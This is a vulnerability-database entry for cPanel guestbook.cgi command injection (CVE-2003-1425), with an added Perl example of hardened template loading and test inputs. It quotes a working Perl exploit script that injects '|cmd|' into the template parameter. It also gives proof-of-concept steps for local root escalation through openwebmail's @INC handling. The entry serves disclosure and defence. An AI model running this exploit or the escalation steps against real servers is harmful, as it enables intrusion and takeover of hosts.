cPanel Guestbook.cgi Remote Command Execution Vulnerability

Vulnerability ID: 1107208
Vulnerability type: Input validation
Published: 2003-02-19
Updated: 2003-12-31
CVE ID: CVE-2003-1425
CNNVD-ID: CNNVD-200312-108
Platform: CGI
CVSS score: 10.0
|Vulnerability source
https://www.exploit-db.com/exploits/22263
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-108
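|Vulnerability details
cPanel is a web hosting control program that lets customers manage their web accounts through a web interface. The guestbook.cgi script included with cPanel does not properly filter user-supplied data, and a remote attacker can exploit this to execute arbitrary commands on the system with the privileges of the cPanel process. Because guestbook.cgi does not correctly filter shell metacharacters, an attacker who submits data such as '|command' in the template variable causes the command to be passed directly to the shell for execution, which may allow arbitrary commands to be executed or arbitrary files to be read with the privileges of the cPanel process.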
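
The advisory text on this page attributes the flaw to Perl's `open` receiving the `template` value unfiltered. The following is an added example, not cPanel's code (guestbook.cgi shipped compiled): it shows the hardened pattern of allowlisting the name and using three-argument `open`. The `load_template` function, the `$TEMPLATE_DIR` directory and the sample values are assumptions made for illustration.

```perl
#!/usr/bin/perl
# Added illustration, not cPanel source: the handler shape, $TEMPLATE_DIR and
# the sample inputs below are assumptions.
use strict;
use warnings;
use File::Temp qw(tempdir);

my $TEMPLATE_DIR = tempdir(CLEANUP => 1);   # stand-in for the real template directory
open(my $seed, '>', "$TEMPLATE_DIR/default.html") or die "seed: $!";
print {$seed} "<h1>Guestbook</h1>\n";
close($seed);

# Unsafe pattern (shown only as a comment): two-argument open lets the *value*
# choose the mode, so a leading or trailing '|' turns a file name into a command.
#     open(TPL, $template);

# Hardened form: allowlist the name, pin the directory, and use three-argument
# open so the mode is fixed to "read" no matter what the value contains.
sub load_template {
    my ($name) = @_;
    return (undef, 'missing') unless defined $name && length $name;
    # Letters, digits, '_' and '-' plus one optional extension: no '/', '..', '|', ';', NUL.
    return (undef, 'rejected') unless $name =~ /\A[A-Za-z0-9_-]{1,64}(?:\.html?)?\z/;
    my $path = "$TEMPLATE_DIR/$name";
    open(my $fh, '<', $path) or return (undef, 'not found');
    local $/;                                # slurp the whole file
    my $body = <$fh>;
    close($fh);
    return ($body, 'ok');
}

# Constructed sample values for the template parameter.
for my $value ('default.html', 'missing.html', '|command|', '../../etc/passwd',
               'default.html;command', "default.html\0|command") {
    my ($body, $status) = load_template($value);
    (my $shown = $value) =~ s/\0/\\0/g;      # make the NUL byte visible when printing
    printf "%-26s -> %s\n", $shown, $status;
}
```

Only `default.html` is read; `missing.html` passes the allowlist but does not exist, and every value carrying a pipe, path separator, semicolon or NUL byte is rejected before `open` is reached.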
|Exploit
source: http://www.securityfocus.com/bid/6882/info
   
A remote command execution vulnerability has been discovered in the cPanel CGI Application. This issue occurs due to insufficient sanitization of externally supplied data to the 'guestbook.cgi' script.
   
An attacker may exploit this vulnerability to execute commands in the security context of the web server hosting the affected script.
   
This vulnerability has been reported to affect cPanel version 5; previous versions may also be affected.

#!/usr/bin/perl
#
# ------- start here -------
#
# Bug found by: pokleyzz
#
# Cpanel is a web hosting control panel which allows clients to manage their web accounts through
# a web interface. Most of the applications are written in perl and compiled to binary.
#
# Details
# =======
# There are multiple vulnerabilities in this package, as described below.
#
# 1) Remote command Execution in guestbook.cgi (/usr/local/cpanel/cgi-sys/guestbook.cgi)
#
# There is a classic perl open function vulnerability in the template variable which allows any
# user to read any file or run commands as the valid system user which is assigned to the specific url
# in the apache configuration.
#
# 2) Local privileges escalation (root)
#
# Cpanel comes with the openwebmail package as one of its web-based email readers, which is suid root.
# On a system with suid perl installed properly (with suid mode turned on), a local user may
# include their own perl script when running the openwebmail script (oom) through suidperl.
#
# Openwebmail will append to the perl include path (@INC) through the SCRIPT_FILENAME environment variable,
# then include some files when executed.
#
# /usr/local/cpanel/base/openwebmail/oom line 14
#
# if ( $ENV{'SCRIPT_FILENAME'} =~ m!^(.*?)/[\w\d\-]+\.pl! || $0 =~ m!^(.*?)/[\w\d\-]+\.pl! ) { $SCRIPT_DIR=$1; }
# if (!$SCRIPT_DIR) { print "Content-type: text/html\n\n\$SCRIPT_DIR not set in CGI script!\n"; exit 0; }
# push (@INC, $SCRIPT_DIR, ".");
# .
# .
# .
# require "openwebmail-shared.pl";
#
# proof of concept:
# i) Create a file openwebmail-shared.pl containing the perl script you want to execute.
# ii) Set SCRIPT_FILENAME to point to the full path of the openwebmail-shared.pl file you just created.
# iii) exec the oom script (ex: suidperl -T /usr/local/cpanel/base/openwebmail/oom )
#
# -------- cut here --------
#
# coded by cyzek. cyzek@efnet
# thanks for p0ng [email protected]

$url = $ARGV[0];
$cmd = $ARGV[1];

if(@ARGV != 2){
        print " jozc.pl - Cpanel 5 and below Remote Exploit by cyzek.\n";
        print " use %20 for spaces.\n";
        print " usage: $0 <host> <cmd>\n";
        exit;
}

use IO::Socket::INET;
$rem = IO::Socket::INET->new(
Proto       => "tcp",
PeerAddr    => $url,
PeerPort    => "80");

if ($rem) {
        print $rem "GET /cgi-sys/guestbook.cgi?user=cpanel&template=|$cmd| HTTP/1.0 \n\r\n\r\n\r";
        @resp = <$rem>;
}
print "@resp\n\n";
|References

Source: XF
Name: cpanel-guestbook-command-execution(11356)
Link: http://xforce.iss.net/xforce/xfdb/11356
Source: BID
Name: 6882
Link: http://www.securityfocus.com/bid/6882
Source: VULNWATCH
Name: 20030218Cpanel5andbelowremotecommandexecutionandlocalrootvulnerabilities
Link: http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0087.html
Source: NSFOCUS
Name: 4466
Link: http://www.nsfocus.net/vulndb/4466